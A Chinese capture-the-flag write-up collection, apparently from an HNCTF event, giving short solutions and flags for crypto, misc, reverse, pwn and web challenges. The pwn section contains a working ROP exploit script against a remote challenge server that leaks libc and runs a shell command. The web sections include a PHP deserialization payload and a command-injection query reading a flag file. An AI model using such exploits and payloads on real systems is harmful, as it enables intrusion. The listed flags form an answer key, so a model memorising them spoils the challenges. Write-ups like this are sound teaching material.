被折叠的显影图纸
010直接搜flag就出了
草甸方阵的密语
先rot找到含有小写flag的
栅栏直接出
光隙中的寄生密钥
图片出压缩包,爆破出密码是9864
套娃
xlsx改成zip,然后解压txt出来再改成docx
隐藏字符复制粘贴出来就有了
flag{HNCTFDKKBKODtK}
babyrsa
直接秒了,pq接近
from math import isqrt
from Crypto.Util.number import long_to_bytes
N = int("12194420073815392880989031611545296854145241675320130314821394843436947373331080911787176737202940676809674543138807024739454432089096794532016797246441325729856528664071322968428804098069997196490382286126389331179054971927655320978298979794245379000336635795490242027519669217784433367021578247340154647762800402140321022659272383087544476178802025951768015423972182045405466448431557625201012332239774962902750073900383993300146193300485117217319794356652729502100167668439007925004769118070105324664379141623816256895933959211381114172778535296409639317535751005960540737044457986793503218555306862743329296169569")
e = 65537
c = int("4504811333111877209539001665516391567038109992884271089537302226304395434343112574404626060854962818378560852067621253927330725244984869198505556722509058098660083054715146670767687120587049288861063202617507262871279819211231233198070574538845161629806932541832207041112786336441975087351873537350203469642198999219863581040927505152110051313011073115724502567261524181865883874517555848163026240201856207626237859665607255740790404039098444452158216907752375078054615802613066229766343714317550472079224694798552886759103668349270682843916307652213810947814618810706997339302734827571635179684652559512873381672063")
a = isqrt(N)
if a * a < N:
a += 1
p = q = None
for i in range(0, 2000):
x2 = a*a - N
b = isqrt(x2)
if b*b == x2:
p = a + b
q = a - b
print("Found difference", i)
break
a += 1
phi = (p-1)*(q-1)
d = pow(e, -1, phi)
m = pow(c, d, N)
flag = long_to_bytes(m)
print(flag)
flag{5c9c885c361541e0b261f58b61db8cec}
cry_rsa
p = 473398607161
q = 4511491
e = 19
phi_n = (p - 1) * (q - 1)
d = pow(e, -1, phi_n)
print(f"d = {d}")
flag_value = d + 10
print(f"flag_value = {flag_value}")flag包裹即可
easy-签到题
丢进cyberchef直接出
easymisc
直接秒了
flag{HNCTFDSnQsL1DPzFn}
easyweb
没有回显的命令执行
直接输出到vps就是了
ez_base
垃圾邮件加密
得到文本放进spammimic - decoded解码
再放进cyberchef解码
ez_js
htm文件里面直接有
f1ag改成flag就行了
ez_math
先解pyinstaller成pyc
Enc.pyc无法一键解码成py
于是解出字节码然后给ai
还原出来了
inputFile = "eqEnc7"
outputFile = "eq.dec"
key = "eq verySimple"
with open(inputFile, "rb") as f:
data = f.read()
dec = []
for index, item in enumerate(data):
dec.append(item ^ ord(key[index % len(key)]))
with open(outputFile, "wb") as f2:
f2.write(bytes(dec))
解密,再运行一遍就是了
inputFile = "eqEnc7"
outputFile = "eq.dec"
key = "eq verySimple"
with open(inputFile, "rb") as f:
data = f.read()
dec = []
for index, item in enumerate(data):
dec.append(item ^ ord(key[index % len(key)]))
with open(outputFile, "wb") as f2:
f2.write(bytes(dec))
z3求解即可
有些人可能要运行十分钟以上
from z3 import *
x = [BitVec(f'x{i}', 8) for i in range(38)]
solver = Solver()
for xi in x:
solver.add(xi >= 32, xi <= 126)
solver.add(-4 * (x[10] * x[13]) - 9 * (x[10] * x[8]) - 4 * (x[12] * x[15]) - 5 * (x[12] * x[32]) - 4 * (x[12] * x[4]) + 6 * x[12] - x[14] * x[27] + 5 * (x[15] * x[34]) + 7 * (x[16] * x[3]) + 2 * (x[18] * x[34]) - 6 * (x[23] * x[34]) + 6 * (x[24] * x[34]) + 8 * (x[25] * x[8]) - 4 * (x[29] * x[7]) - x[31] * x[5] + 47034 == 0)
solver.add(9 * (x[0] * x[2]) - 2 * (x[10] * x[20]) + 10 * (x[13] * x[16]) + x[13] * x[32] - 2 * (x[24] * x[37]) - 2 * (x[3] * x[31]) - 7 * (x[31] * x[35]) + 10 * (x[31] * x[8]) + 3 * (x[33] * x[8]) - 6 * (x[6] * x[8]) - 175892 == 0)
solver.add(4 * (x[13] * x[19]) + 2 * (x[15] * x[29]) - 2 * (x[20] * x[22]) - 9 * (x[25] * x[9]) - 3 * (x[26] * x[30]) - x[28] * x[3] - x[30] * x[31] - 3 * (x[31] * x[9]) - 5 * (x[33] * x[8]) + 127013 == 0)
solver.add(8 * (x[10] * x[7]) - 5 * (x[13] * x[37]) + 7 * (x[13] * x[5]) + 5 * (x[14] * x[2]) + 3 * (x[17] * x[4]) + 8 * (x[18] * x[35]) + 2 * x[19] * x[19] + 7 * (x[23] * x[7]) + x[24] * x[25] + 6 * (x[28] * x[31]) + 4 * (x[31] * x[5]) + 4 * (x[31] * x[8]) - 2 * (x[32] * x[9]) - 2 * (x[33] * x[36]) + 7 * (x[33] * x[7]) - 4 * (x[5] * x[7]) - 200857 == 0)
solver.add(5 * x[0] * x[0] - x[0] * x[7] - 8 * (x[11] * x[5]) + 10 * (x[13] * x[23]) - 6 * (x[14] * x[29]) + 2 * (x[16] * x[31]) + 8 * (x[21] * x[22]) - 5 * (x[29] * x[30]) - 4 * (x[29] * x[32]) - 6 * x[9] - 104088 == 0)
solver.add(9 * (x[10] * x[18]) + 3 * (x[10] * x[23]) + 6 * (x[13] * x[16]) - 10 * (x[14] * x[15]) - 6 * (x[18] * x[32]) - 4 * (x[20] * x[5]) + x[22] * x[29] - 8 * (x[23] * x[31]) + 7 * (x[28] * x[8]) - x[29] * x[29] - x[3] * x[9] - 3 * (x[31] * x[36]) - 87766 == 0)
solver.add(3 * x[11] * x[11] - x[11] * x[19] - 10 * (x[15] * x[20]) - 5 * (x[18] * x[6]) + 8 * x[18] + 9 * (x[21] * x[4]) - 10 * (x[22] * x[32]) - 9 * x[23] * x[23] - 3 * (x[23] * x[26]) - 4 * x[28] * x[28] - 3 * (x[28] * x[33]) + 8 * x[30] - 6 * x[37] * x[37] - 7 * (x[37] * x[6]) - 10 * (x[7] * x[8]) + 325935 == 0)
solver.add(-4 * (x[10] * x[12]) + 5 * (x[10] * x[2]) - 2 * (x[10] * x[5]) - 8 * (x[10] * x[8]) - 4 * (x[13] * x[19]) + 9 * (x[17] * x[22]) - 2 * (x[20] * x[28]) - 5 * (x[21] * x[37]) - 7 * (x[25] * x[4]) - x[26] * x[31] - 10 * (x[27] * x[28]) + x[28] * x[28] - 9 * (x[3] * x[7]) - 8 * (x[30] * x[32]) - 10 * (x[31] * x[32]) + 4 * (x[31] * x[33]) - 10 * (x[33] * x[5]) + x[35] * x[8] + 10 * (x[37] * x[4]) - 7 * x[37] + 230954 == 0)
solver.add(-6 * (x[0] * x[10]) - 2 * x[0] - 3 * (x[1] * x[10]) + 2 * (x[1] * x[35]) + 2 * (x[10] * x[23]) - 5 * (x[13] * x[34]) - 10 * (x[15] * x[19]) - 7 * (x[15] * x[29]) + 9 * (x[19] * x[24]) + 2 * (x[19] * x[29]) - 3 * (x[19] * x[8]) - 2 * (x[2] * x[20]) + 6 * (x[2] * x[26]) - 9 * (x[2] * x[9]) - 10 * (x[22] * x[34]) + 4 * x[25] * x[25] - 7 * (x[26] * x[6]) + 7 * (x[3] * x[32]) + 2 * x[3] + 4 * (x[5] * x[6]) + 236693 == 0)
solver.add(-10 * (x[0] * x[10]) + 9 * (x[0] * x[6]) + 8 * (x[10] * x[15]) - 5 * (x[12] * x[18]) - 9 * (x[15] * x[20]) + 7 * (x[16] * x[34]) + 4 * (x[17] * x[18]) + 6 * (x[17] * x[37]) - 2 * x[17] + 4 * (x[2] * x[27]) - 5 * (x[2] * x[36]) - 7 * (x[20] * x[5]) + 2 * (x[22] * x[25]) - 5 * (x[3] * x[36]) - x[32] * x[37] - x[5] * x[7] - 15841 == 0)
solver.add(4 * (x[0] * x[37]) - 8 * (x[1] * x[32]) - 8 * (x[10] * x[14]) + 10 * (x[11] * x[20]) - 4 * (x[12] * x[2]) + 9 * (x[13] * x[3]) - 8 * (x[13] * x[37]) - x[14] * x[25] - 3 * (x[15] * x[8]) + 3 * (x[18] * x[29]) + 6 * (x[21] * x[30]) + 8 * (x[26] * x[33]) + 2 * (x[26] * x[9]) + 8 * (x[27] * x[34]) - 8 * (x[31] * x[35]) - 6 * (x[31] * x[7]) - 5 * (x[32] * x[35]) + 2 * (x[35] * x[4]) - 83831 == 0)
solver.add(-7 * (x[0] * x[4]) + 3 * x[10] * x[10] - 4 * (x[10] * x[25]) + 3 * (x[13] * x[2]) - 5 * (x[14] * x[23]) + 9 * (x[15] * x[22]) - 8 * (x[16] * x[18]) + 8 * (x[16] * x[33]) + 4 * (x[17] * x[20]) - 7 * (x[17] * x[21]) + 4 * (x[17] * x[5]) - x[18] * x[32] - 2 * (x[19] * x[22]) + 8 * (x[23] * x[29]) + 5 * (x[23] * x[34]) - 44148 == 0)
solver.add(-4 * (x[1] * x[3]) - 6 * (x[10] * x[23]) - x[11] * x[4] + 3 * (x[12] * x[20]) - 9 * (x[12] * x[4]) + 5 * (x[15] * x[29]) - 9 * (x[17] * x[24]) + 4 * (x[18] * x[24]) - 10 * (x[2] * x[23]) - 5 * (x[21] * x[36]) - 5 * (x[22] * x[24]) + 10 * (x[24] * x[30]) + 5 * (x[25] * x[34]) + 9 * (x[33] * x[37]) + 160533 == 0)
solver.add(10 * (x[0] * x[31]) - 8 * x[10] * x[10] + 7 * (x[10] * x[20]) - 5 * x[13] * x[13] - 8 * (x[16] * x[37]) + 9 * (x[19] * x[22]) - 10 * (x[25] * x[35]) - 6 * (x[27] * x[35]) + 6 * x[31] * x[31] + 3 * (x[33] * x[9]) - 5 * (x[5] * x[9]) + x[5] + 108890 == 0)
solver.add(-8 * (x[0] * x[9]) + 2 * (x[1] * x[17]) - x[10] * x[18] - 10 * (x[12] * x[14]) - 5 * (x[12] * x[16]) - x[13] * x[21] - 7 * (x[13] * x[32]) - 2 * (x[16] * x[33]) + 8 * (x[17] * x[34]) + 9 * (x[17] * x[37]) + x[2] * x[30] - 3 * (x[20] * x[22]) - 3 * (x[22] * x[28]) + 5 * (x[26] * x[32]) + 10 * (x[26] * x[9]) - 6 * x[27] + 10 * (x[34] * x[37]) + 6 * x[35] * x[35] + 7 * (x[5] * x[6]) - 148901 == 0)
solver.add(2 * (x[13] * x[17]) - 9 * x[13] + 3 * (x[14] * x[35]) + 6 * (x[15] * x[30]) + 8 * (x[16] * x[35]) - 4 * (x[17] * x[36]) + 6 * (x[22] * x[28]) + 9 * (x[23] * x[30]) - x[23] * x[9] + 2 * (x[24] * x[7]) - 7 * (x[26] * x[27]) - 9 * (x[3] * x[36]) + 9 * x[5] - 87239 == 0)
solver.add(9 * x[0] - x[15] * x[22] + 4 * (x[2] * x[7]) - 6 * (x[20] * x[3]) + 4 * (x[3] * x[30]) + 9 * (x[31] * x[7]) - 7 * (x[34] * x[35]) - x[34] * x[4] + 20054 == 0)
solver.add(6 * (x[1] * x[14]) - 7 * (x[10] * x[7]) - 2 * (x[10] * x[9]) + 7 * (x[11] * x[25]) + 2 * (x[14] * x[3]) - 8 * (x[14] * x[6]) - 8 * (x[15] * x[4]) + 10 * (x[16] * x[36]) - 6 * (x[20] * x[26]) - 10 * (x[22] * x[23]) + 9 * (x[22] * x[32]) + 5 * (x[23] * x[28]) + 10 * (x[23] * x[31]) - 8 * (x[24] * x[28]) - 4 * (x[26] * x[37]) + 2 * (x[27] * x[36]) - 10 * (x[32] * x[6]) + 51831 == 0)
solver.add(7 * (x[10] * x[36]) - 4 * (x[13] * x[14]) - 5 * (x[13] * x[19]) + 7 * (x[13] * x[36]) + 10 * (x[14] * x[31]) - 7 * (x[15] * x[29]) - 8 * (x[16] * x[3]) + 7 * (x[17] * x[8]) + 5 * (x[17] * x[9]) + 6 * (x[19] * x[29]) - 8 * (x[2] * x[20]) - 9 * (x[2] * x[5]) + 7 * (x[20] * x[32]) + 8 * (x[20] * x[33]) - 4 * (x[20] * x[8]) + 3 * (x[34] * x[7]) + 21840 == 0)
solver.add(-4 * (x[1] * x[4]) + 10 * (x[1] * x[9]) + 6 * x[14] * x[14] + 7 * (x[14] * x[37]) - x[15] * x[25] - 6 * (x[16] * x[20]) - 3 * (x[19] * x[30]) - 6 * (x[19] * x[8]) - 6 * (x[31] * x[34]) - 7 * (x[32] * x[4]) - 3 * (x[32] * x[9]) - 7 * (x[35] * x[9]) - 2 * (x[36] * x[8]) + 145874 == 0)
solver.add(-7 * (x[0] * x[19]) - 5 * (x[1] * x[35]) - 6 * (x[15] * x[23]) - 4 * (x[19] * x[24]) - x[20] * x[28] + 9 * (x[20] * x[33]) + 9 * (x[22] * x[24]) - 4 * (x[22] * x[25]) + 10 * (x[3] * x[36]) + 5 * (x[34] * x[6]) - 6 * (x[36] * x[37]) + x[37] * x[37] + 64330 == 0)
solver.add(3 * (x[0] * x[35]) - 2 * (x[10] * x[11]) - 8 * (x[11] * x[16]) + 5 * (x[11] * x[25]) + 3 * (x[11] * x[26]) + 8 * (x[11] * x[34]) - 8 * (x[11] * x[6]) - 9 * (x[12] * x[13]) - 7 * (x[14] * x[23]) + 2 * (x[15] * x[19]) - 9 * (x[15] * x[20]) + 7 * (x[16] * x[2]) - 9 * (x[18] * x[30]) + 4 * (x[18] * x[6]) + 7 * (x[19] * x[32]) + 4 * (x[19] * x[37]) + 4 * x[22] * x[22] - 10 * (x[22] * x[4]) - x[24] * x[7] + 5 * (x[25] * x[5]) - 10 * (x[25] * x[7]) + 4 * x[8] * x[8] - 7487 == 0)
solver.add(-2 * (x[0] * x[13]) - 10 * (x[1] * x[36]) - 4 * (x[16] * x[4]) - 6 * (x[16] * x[9]) - 5 * (x[22] * x[7]) - 3 * (x[23] * x[31]) - 6 * (x[28] * x[9]) - 5 * (x[33] * x[35]) + 8 * x[9] + 302002 == 0)
solver.add(-9 * (x[0] * x[17]) + 3 * (x[11] * x[17]) - 7 * (x[11] * x[3]) + 6 * (x[11] * x[9]) - 9 * (x[12] * x[21]) - x[13] * x[35] + 2 * (x[14] * x[2]) + 7 * (x[14] * x[35]) - 9 * (x[18] * x[26]) - 8 * (x[19] * x[24]) - 2 * (x[19] * x[27]) + 8 * (x[2] * x[3]) - 10 * (x[21] * x[5]) - 3 * (x[22] * x[7]) - 7 * (x[29] * x[3]) + x[30] * x[31] - 7 * (x[6] * x[8]) + 260271 == 0)
solver.add(5 * (x[1] * x[16]) - 8 * (x[1] * x[30]) - 2 * (x[10] * x[28]) + 4 * (x[10] * x[29]) + 10 * (x[13] * x[20]) - 4 * (x[15] * x[23]) - 2 * (x[18] * x[22]) + 3 * (x[19] * x[28]) + 9 * (x[2] * x[21]) + 3 * (x[2] * x[9]) - 9 * (x[22] * x[3]) - 4 * (x[22] * x[4]) - 6 * (x[24] * x[34]) - 8 * (x[25] * x[35]) + x[25] * x[9] - 4 * (x[27] * x[9]) + 5 * (x[29] * x[33]) - 6 * (x[29] * x[8]) - 5 * (x[30] * x[8]) - 8 * (x[31] * x[4]) - 8 * (x[33] * x[36]) + 170075 == 0)
solver.add(-5 * (x[0] * x[36]) + 7 * (x[1] * x[10]) - 10 * (x[13] * x[22]) - 3 * (x[13] * x[8]) - 3 * (x[14] * x[21]) + 6 * (x[14] * x[28]) - 5 * (x[14] * x[29]) - 8 * (x[14] * x[32]) + x[18] * x[32] + 9 * (x[18] * x[35]) - x[19] * x[22] - x[19] * x[31] - 8 * (x[2] * x[3]) - 3 * (x[21] * x[33]) + 3 * x[22] * x[22] + 2 * (x[23] * x[34]) - 10 * (x[26] * x[35]) + 5 * (x[29] * x[35]) + 3 * x[31] * x[31] + 6 * (x[34] * x[4]) + 89886 == 0)
solver.add(6 * (x[10] * x[24]) + 5 * (x[12] * x[26]) + 8 * (x[13] * x[27]) + x[16] * x[29] + x[17] * x[31] - 7 * (x[18] * x[29]) + 8 * x[18] + 2 * (x[20] * x[34]) + 10 * (x[21] * x[22]) - 4 * (x[22] * x[37]) - 6 * (x[24] * x[28]) + 6 * (x[24] * x[29]) + 6 * (x[25] * x[32]) + 10 * (x[27] * x[3]) + 9 * (x[28] * x[6]) + x[31] * x[4] - 278257 == 0)
solver.add(2 * (x[11] * x[15]) + 6 * (x[14] * x[29]) + 4 * (x[14] * x[3]) + 7 * (x[17] * x[18]) - 5 * x[2] * x[2] + 2 * (x[21] * x[22]) + 3 * (x[23] * x[29]) + 7 * x[23] + 7 * (x[3] * x[4]) - 8 * (x[31] * x[36]) - 10 * (x[32] * x[8]) - 91469 == 0)
solver.add(-9 * (x[0] * x[7]) - 5 * (x[1] * x[35]) - x[12] * x[4] + 2 * (x[17] * x[24]) + 2 * (x[21] * x[5]) + x[24] * x[33] - 4 * (x[26] * x[33]) - 3 * (x[27] * x[31]) + 5 * (x[29] * x[3]) - 4 * (x[35] * x[6]) + 54481 == 0)
solver.add(2 * (x[10] * x[27]) - 10 * (x[10] * x[3]) + 6 * (x[12] * x[3]) + 9 * (x[12] * x[4]) - 9 * (x[15] * x[8]) + 10 * (x[17] * x[27]) - 8 * (x[18] * x[35]) + 9 * (x[2] * x[32]) - 8 * (x[20] * x[5]) - 5 * x[20] - 2 * (x[24] * x[8]) - 8 * (x[32] * x[5]) - x[35] * x[35] + 50647 == 0)
solver.add(8 * (x[0] * x[19]) - 3 * (x[10] * x[17]) + 7 * (x[10] * x[31]) - 2 * (x[16] * x[20]) - 10 * (x[2] * x[25]) - x[20] * x[29] - 5 * (x[20] * x[3]) + 2 * (x[23] * x[31]) + x[27] * x[31] + 3 * (x[27] * x[32]) + 8 * (x[28] * x[35]) - 6 * (x[28] * x[6]) - 4 * x[30] * x[30] - 5 * (x[36] * x[9]) + 42819 == 0)
solver.add(-3 * (x[10] * x[19]) - x[10] * x[21] + 3 * (x[17] * x[3]) + 8 * (x[18] * x[5]) + 2 * (x[21] * x[31]) + 3 * (x[24] * x[36]) + 2 * (x[29] * x[34]) - 2 * (x[30] * x[32]) + 9 * (x[35] * x[5]) - 4 * (x[37] * x[5]) - 31908 == 0)
solver.add(-6 * (x[0] * x[31]) - 9 * (x[1] * x[20]) + 9 * (x[1] * x[6]) + 3 * (x[11] * x[13]) - 5 * (x[11] * x[36]) + 4 * (x[14] * x[20]) + 5 * (x[15] * x[26]) + x[24] * x[6] + 4 * (x[27] * x[31]) - 2 * (x[29] * x[7]) - 10 * (x[3] * x[4]) + 7 * (x[35] * x[36]) + 105594 == 0)
solver.add(8 * (x[12] * x[15]) + 2 * (x[12] * x[23]) + 4 * x[13] * x[13] + 3 * (x[13] * x[6]) - x[14] * x[30] - 2 * (x[16] * x[19]) - x[16] * x[25] - 4 * (x[18] * x[30]) + 10 * (x[19] * x[37]) + 10 * (x[2] * x[30]) + 10 * (x[21] * x[37]) - 8 * (x[21] * x[7]) + 5 * (x[24] * x[33]) - x[27] * x[7] - 10 * (x[27] * x[9]) + x[33] * x[34] - 259570 == 0)
solver.add(-4 * (x[0] * x[24]) + 10 * (x[12] * x[14]) + 10 * (x[15] * x[28]) - 6 * (x[15] * x[35]) - 8 * (x[15] * x[37]) - x[16] * x[22] - 3 * (x[16] * x[27]) - 4 * (x[18] * x[28]) + 3 * (x[19] * x[26]) + 8 * (x[19] * x[36]) + 5 * (x[20] * x[24]) - 9 * (x[24] * x[32]) - 7 * x[3] + 8 * x[32] - 5 * (x[5] * x[8]) + 26189 == 0)
solver.add(x[10] * x[35] - 2 * (x[12] * x[37]) + 3 * (x[13] * x[22]) + 2 * (x[13] * x[27]) + 5 * (x[14] * x[33]) - 9 * (x[15] * x[8]) + 2 * (x[16] * x[4]) + 7 * (x[19] * x[9]) + 6 * (x[2] * x[27]) + 7 * (x[20] * x[6]) + 8 * (x[21] * x[35]) - 3 * (x[21] * x[9]) - 6 * (x[24] * x[28]) + 2 * (x[31] * x[33]) - 9 * x[6] - 132667 == 0)
solver.add(10 * (x[10] * x[31]) - 10 * (x[12] * x[4]) + x[15] * x[23] - x[18] * x[30] + 4 * (x[19] * x[29]) - 4 * (x[19] * x[4]) - 8 * (x[2] * x[27]) - 4 * (x[2] * x[29]) + 10 * (x[20] * x[24]) + 7 * (x[20] * x[35]) + x[25] * x[27] + 9 * (x[27] * x[30]) + 2 * (x[27] * x[7]) - 4 * (x[28] * x[7]) - 2 * (x[3] * x[33]) + 4 * x[37] * x[37] - 17537 == 0)
solver.add(10 * x[0] * x[0] + 3 * (x[1] * x[29]) - 2 * (x[11] * x[13]) - 8 * (x[12] * x[28]) - 2 * x[13] - 10 * (x[14] * x[26]) - 3 * (x[15] * x[9]) + 8 * (x[19] * x[26]) + 3 * (x[19] * x[28]) + 9 * (x[21] * x[36]) - 2 * x[23] - 8 * (x[25] * x[26]) + x[28] * x[32] - 5 * (x[29] * x[6]) + 10 * (x[33] * x[6]) - 2 * (x[36] * x[5]) - 82595 == 0)
if solver.check() == sat:
model = solver.model()
flag = ''.join(chr(model[xi].as_long()) for xi in x)
print(f'[+] Flag: {flag}')
else:
print('[-] No solution found.')
flag{815ddbd7a20d03a9cea4dd6ef8685c74}
ez_picture
from PIL import Image
def extract_lsb_from_image(image_path):
img = Image.open(image_path)
pixels = list(img.getdata())
bits = []
for pixel in pixels:
for channel in pixel[:3]:
bits.append(channel & 1)
bytes_out = []
for i in range(0, len(bits), 8):
byte = 0
for bit in bits[i:i+8]:
byte = (byte << 1) | bit
bytes_out.append(byte)
hidden_message = bytearray()
for b in bytes_out:
if b == 0:
break
hidden_message.append(b)
return hidden_message.decode('utf-8', errors='ignore')
if __name__ == "__main__":
path = "/Users/zhujiayi/Downloads/ez_picture3/15.png"
message = extract_lsb_from_image(path)
print(message)解压出来是jpg
属性里面有字符
ez_pwn
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
# 远程连接信息
host = '47.105.113.86'
port = 30003
# libc和ld文件路径
libc_path = './libc-2.31.so' # 正确的libc文件路径
ld_path = './ld-2.31.so' # 正确的ld文件路径
elf = ELF('./pwn') # 二进制文件路径
libc = ELF(libc_path)
def exploit(p):
p.recvuntil(b"Close your eye, and you are blind now.")
pop_rdi_ret = 0x4012c3
pop_rsi_r15_ret = 0x4012c1
ret_addr = 0x40101a
write_plt = 0x401070
write_got = 0x404018
main_addr = 0x401207
payload1 = b'A' * 0x28 # buf[32] + saved rbp(8)
payload1 += p64(pop_rdi_ret) # pop rdi; ret
payload1 += p64(2)
payload1 += p64(pop_rsi_r15_ret) # pop rsi; pop r15; ret
payload1 += p64(write_got)
payload1 += p64(0)
payload1 += p64(write_plt)
payload1 += p64(main_addr)
p.send(payload1)
leak_data = p.recv(8)
write_addr = u64(leak_data)
log.success(f"Leaked write address: {hex(write_addr)}")
write_offset = libc.symbols['write']
libc.address = write_addr - write_offset
log.success(f"Libc base address: {hex(libc.address)}")
system_addr = libc.symbols['system']
bin_sh_addr = next(libc.search(b'/bin/sh'))
log.info(f"System address: {hex(system_addr)}")
log.info(f"/bin/sh address: {hex(bin_sh_addr)}")
command = b'cat /flag >&2'
read_addr = libc.symbols['read']
bss_addr = 0x404060 + 0x100
payload2 = b'A' * 0x28
payload2 += p64(pop_rdi_ret)
payload2 += p64(0)
payload2 += p64(pop_rsi_r15_ret)
payload2 += p64(bss_addr)
payload2 += p64(0)
payload2 += p64(read_addr)
payload2 += p64(pop_rdi_ret)
payload2 += p64(bss_addr)
payload2 += p64(system_addr)
p.send(payload2)
p.send(command)
p.interactive()
p = remote(host, port)
exploit(p)
运行完直接出flag
flag{a51a3bdf23919f677efccd90270da72f}
ez_xor
爆破xor就行了
a = "5f55585e42717a6d7f484e5c786a7d080f0d44"
for i in range(10000):
for j in range(0, len(a), 2):
print(chr(int(a[j:j+2], 16)^i), end="")
print()
# FLAG{hctfQWEasd123}
gift
题目中说,礼物的一份散落成了 1 - 1/3 + 1/5 - 1/7 + … 这样的一个级数。
这是一个著名的数学级数,叫做莱布尼茨级数 (Leibniz series) 或者马德hava-莱布尼茨级数。这个级数收敛于 π/4。
所以,丢失的那一份礼物就代表了 π/4。
- 计算整个礼物:
既然礼物被平均分成了四份,而其中一份是 π/4,那么整个礼物就是 4 * (π/4) = π。
- 猜测礼物的名称:
整个礼物是 π (圆周率)。题目给出的 flag 示例是 flag{apple}、flag{watermelon},这表明礼物应该是一个具体的物品名称。
π 的英文发音是 "pi" /paɪ/,这和 "pie" (馅饼) /paɪ/ 的发音非常相似。
考虑到这是一个脑筋急转弯类型的题目,爸爸带的礼物很可能就是 "pie" (馅饼)。
- 凯撒密码加密:
题目要求将 flag 的值(也就是礼物名称)用凯撒密码加密,偏移量为 6。
我们要加密的单词是 "pie"。
-
'p' 是字母表中的第16个字母。偏移6位后变成第 (16 - 1 + 6) % 26 + 1 = 21 % 26 + 1 = 22个字母,即 'v'。(或者,从0开始索引,p是第15位,(15+6)%26 = 21,第21位是v)
-
'i' 是字母表中的第9个字母。偏移6位后变成第 (9 - 1 + 6) % 26 + 1 = 14 % 26 + 1 = 15个字母,即 'o'。(或者,i是第8位,(8+6)%26 = 14,第14位是o)
-
'e' 是字母表中的第5个字母。偏移6位后变成第 (5 - 1 + 6) % 26 + 1 = 10 % 26 + 1 = 11个字母,即 'k'。(或者,e是第4位,(4+6)%26 = 10,第10位是k)
所以,"pie" 加密后得到 "vok"。
- 最终的 flag:
将加密后的值放入 flag 格式中,得到 flag{vok}。
因此,爸爸带的礼物是 "pie" (馅饼),提交的 flag 应该是 flag{vok}。
sign in
明显rc4,上面密钥,下面秘文
YWB_Web_反序列化
很容易就能构造链
O:7:"mylogin":2:{s:4:"user";s:5:"admin";s:4:"pass";s:11:"myzS@11wawq";}
flag{ptn4pymi1h7o}
YWB_Web_命令执行过滤绕过
很容易就能构造
?cmd=print(file_get_contents(%27/tmp/flag.nisp%27));
flag{dnu3stfgjy61}
YWB_Web_未授权访问
改一下权限就行
YWB_Web_xff
全伪造成2.2.2.1就行
发表评论